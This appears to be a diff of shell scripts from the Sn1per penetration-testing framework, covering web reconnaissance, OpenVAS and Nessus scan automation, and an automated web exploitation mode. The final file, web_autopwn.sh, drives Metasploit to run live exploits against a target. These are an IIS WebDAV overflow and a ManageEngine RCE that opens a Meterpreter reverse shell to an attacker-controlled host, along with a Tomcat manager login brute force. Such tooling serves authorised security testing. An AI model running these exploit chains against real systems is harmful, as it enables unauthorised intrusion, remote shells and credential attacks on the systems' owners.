if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
echo " "
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau --subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:443 -l 1 -v n
cp -f /usr/share/blackwidow/"$TARGET"_443/"$TARGET"_443-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null >> $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
if [[ $WEB_BRUTE_STEALTHSCAN == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
egrep -v '<|>|;|(|)' $LOOT_DIR/web/robots-$TARGET-https.txt | tee $LOOT_DIR/web/robots-$TARGET-https.txt
fi
if [[ "$SSL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
fi
if [[ "$SSL_INSECURE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl https://$TARGET 2> $LOOT_DIR/web/curldebug-$TARGET.txt > /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
source $INSTALL_DIR/modes/sc0pe.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_stealth.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

134
modes/vulnscan.sh Normal file
View File

@@ -0,0 +1,134 @@
# FULLPORTONLY MODE
if [[ "$MODE" = "vulnscan" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m vulnscan"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
logo
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$NESSUS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NESSUS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
bash /usr/share/sniper/bin/nessus.sh $TARGET $NESSUS_KEY $NESSUS_HOST $NESSUS_USERNAME $NESSUS_PASSWORD $NESSUS_POLICY_ID $LOOT_DIR
fi
if [[ "$OPENVAS" = "1" ]]; then
sudo openvas-start 2> /dev/null > /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OPENVAS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "Scanning target: $TARGET "
echo ""
echo "-----------------------------------------------"
echo "Listing OpenVAS version..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -O
echo ""
echo "Listing OpenVAS targets..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -T
echo ""
echo "Listing OpenVAS tasks..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G
echo ""
echo "Creating scan task..."
echo "-----------------------------------------------"
ASSET_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="<create_target><name>$TARGET</name><hosts>$TARGET</hosts></create_target>" | xmlstarlet sel -t -v /create_target_response/@id) && echo "ASSET_ID: $ASSET_ID"
if [[ "$ASSET_ID" == "" ]]; then
ASSET_ID_ERROR=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="<create_target><name>$TARGET</name><hosts>$TARGET</hosts></create_target>")
if [[ "$ASSET_ID_ERROR" == *"Target exists already"* ]]; then
ASSET_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -T | grep " $TARGET" | awk '{print $1}')
echo "ASSET_ID: $ASSET_ID"
fi
fi
TASK_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<create_task><name>$TARGET</name><preferences><preference><scanner_name>source_iface</scanner_name><value>eth0</value></preference></preferences><config id=\"74db13d6-7489-11df-91b9-002264764cea\"/><target id=\"$ASSET_ID\"/></create_task>" | xmlstarlet sel -t -v /create_task_response/@id) && echo "TASK_ID: $TASK_ID"
if [[ "TASK_ID" == "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<create_task><name>$TARGET</name><preferences><preference><scanner_name>source_iface</scanner_name><value>eth0</value></preference></preferences><config id=\"74db13d6-7489-11df-91b9-002264764cea\"/><target id=\"$ASSET_ID\"/></create_task>"
fi
REPORT_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<start_task task_id=\"$TASK_ID\"/>" | cut -d\> -f3 | cut -d\< -f1) && echo "REPORT_ID: $REPORT_ID"
if [[ "$REPORT_ID" == "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<start_task task_id=\"$TASK_ID\"/>"
fi
echo ""
resp=""
while [[ $resp != "Done" && $REPORT_ID != "" ]]
do
omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TASK_ID
resp=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep "$TASK_ID" | awk '{print $2}')
sleep 60
done
if [[ $REPORT_ID != "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<get_reports report_id=\"$REPORT_ID\" format_id=\"6c248850-1f62-11e1-b082-406186ea4fc5\"/>" | cut -d\> -f3 | cut -d\< -f1 | base64 -d > "$LOOT_DIR/output/openvas-$TARGET.html"
echo "Report saved to $LOOT_DIR/output/openvas-$TARGET.html"
cat $LOOT_DIR/output/openvas-$TARGET.html 2> /dev/null
else
echo "No report ID found. Listing scan tasks:"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET
fi
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
fi
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
loot
exit
fi

22
modes/web.sh Normal file
View File

@@ -0,0 +1,22 @@
# WEB MODE #############################################################################################################
if [[ "$MODE" = "web" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
fi

236
modes/web_autopwn.sh Normal file
View File

@@ -0,0 +1,236 @@
if [[ "$MSF_LEGACY_WEB_EXPLOITS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; set PAYLOAD windows/meterpreter/reverse_tcp; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
